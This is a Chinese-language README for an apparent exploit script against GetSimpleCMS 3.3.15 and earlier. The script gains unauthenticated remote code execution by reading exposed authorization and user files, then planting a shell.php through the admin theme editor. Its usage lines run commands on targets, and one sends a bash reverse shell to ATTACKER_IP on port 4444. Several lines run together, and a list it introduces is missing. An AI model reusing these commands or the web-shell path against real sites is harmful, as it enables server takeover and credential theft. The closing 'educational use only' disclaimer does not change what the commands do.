针对 GetSimpleCMS ≤ 3.3.15 的未认证远程代码执行漏洞利用
GetSimpleCMS 会公开暴露敏感文件(/data/other/authorization.xml、/data/users/),攻击者可以:
CVSS 评分: 9.8(严重)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - 主漏洞利用脚本requirements.txt - 依赖项(requests、beautifulsoup4)⚠️ 仅供教育用途。 仅可在你自己拥有或已获授权的系统上进行测试。